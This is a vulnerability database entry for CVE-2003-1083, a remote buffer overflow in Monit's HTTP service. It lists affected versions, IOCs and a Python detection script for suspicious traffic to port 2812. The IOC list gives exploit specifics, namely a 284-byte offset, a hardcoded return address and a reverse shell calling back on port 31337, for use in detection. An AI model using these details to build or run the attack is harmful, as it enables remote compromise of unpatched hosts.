CVE-2003-1083
published 2003-12-31

CVE-2003-1083: Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.

Priority: P355 · Severity: critical · CVSS 2.0 score: 10
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Tag: EXPLOIT
EPSS: 21.11% (97.3th percentile)

Affected

22 ranges

Vendor | Product | Version range | Fixed in
debian | monit | < monit 1:4.2.1-1 (bookworm) | monit 1:4.2.1-1 (bookworm)
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | |
tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1
tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1
tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1
tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1

Detection & IOCs (extracted from sources)

port: 2812
port: 31337
bytes: \xcf\x89\xb3\x40
bytes: \x83\xC4\x40
  • Monit's HTTP listener on TCP/2812 is the attack surface; monitor for oversized HTTP requests (>256 bytes of payload) sent to this port, particularly those containing NOP sleds (0x90 sequences) followed by shellcode.
  • The exploit payload is terminated with a bare double newline (\n\n) rather than a well-formed HTTP request; detect HTTP traffic to port 2812 that lacks standard HTTP method/version headers but ends with \n\n.
  • The reverse shellcode connects back to the attacker on a configurable port (default 31337); monitor for unexpected outbound TCP connections from the Monit process, especially to port 31337.
  • The exploit buffer uses a fixed offset of 284 bytes before the return address overwrite; IDS signatures can match payloads to TCP/2812 containing 284+ repeated bytes followed by a 4-byte EIP value.
  • The return address used in exploit 1 (0x40b389cf) is specific to Mandrake 9.1 builds of Monit; the exploit for other distributions requires a different EIP value and offset, meaning signatures based solely on the hardcoded return address will miss cross-platform variants.
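
The structural heuristics from the list above, combined into one check over a captured client-to-server payload. This is an added example, not code from the page or from Monit; the function names, the two-indicator alert rule and the sample payloads are assumptions constructed for illustration. It deliberately does not match on return-address bytes, since those vary per build.

```python
import re

MONIT_PORT = 2812        # Monit HTTP listener (from the page)
MAX_REQUEST_BYTES = 256  # size threshold named on the page
FILLER_RUN = 284         # filler length before the overwrite (from the page)

# A well-formed HTTP/1.x request line: METHOD SP target SP HTTP/x.y
REQUEST_LINE = re.compile(rb"^[A-Z]{3,10} \S+ HTTP/\d\.\d\r?\n")
# Any single byte repeated FILLER_RUN or more times (0x90 sleds or other filler)
REPEATED_RUN = re.compile(rb"(.)\1{%d,}" % (FILLER_RUN - 1), re.DOTALL)


def indicators(dst_port: int, payload: bytes) -> list[str]:
    """Return the names of the heuristics a client-to-server payload matches."""
    if dst_port != MONIT_PORT:
        return []
    hits = []
    if len(payload) > MAX_REQUEST_BYTES:
        hits.append("oversized")
    if not REQUEST_LINE.match(payload):
        hits.append("no-request-line")
    # Bare LF LF terminator; a normal request ends with CR LF CR LF
    if payload.endswith(b"\n\n"):
        hits.append("bare-lf-terminator")
    if REPEATED_RUN.search(payload):
        hits.append("repeated-filler")
    return hits


def is_suspicious(dst_port: int, payload: bytes) -> bool:
    """Alert only when at least two independent heuristics agree (assumed rule)."""
    return len(indicators(dst_port, payload)) >= 2


# Constructed samples: no shellcode, and a placeholder 4-byte value after the filler.
BENIGN = b"GET / HTTP/1.0\r\nHost: monitor.example\r\n\r\n"
LF_ONLY_CLIENT = b"GET / HTTP/1.0\n\n"  # sloppy but harmless client
SUSPECT = b"A" * FILLER_RUN + b"BBBB" + b"\n\n"

if __name__ == "__main__":
    for name, data in [("benign", BENIGN), ("lf-only", LF_ONLY_CLIENT), ("suspect", SUSPECT)]:
        print(name, indicators(MONIT_PORT, data), is_suspicious(MONIT_PORT, data))
```

Requiring two indicators keeps an LF-only client from alerting on the terminator alone.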

CVSS provenance

nvd (v2.0): 10.0 CRITICAL, AV:N/AC:L/Au:N/C:C/I:C/A:C
osv: 10.0 CRITICAL
vendor_debian: 10.0 CRITICAL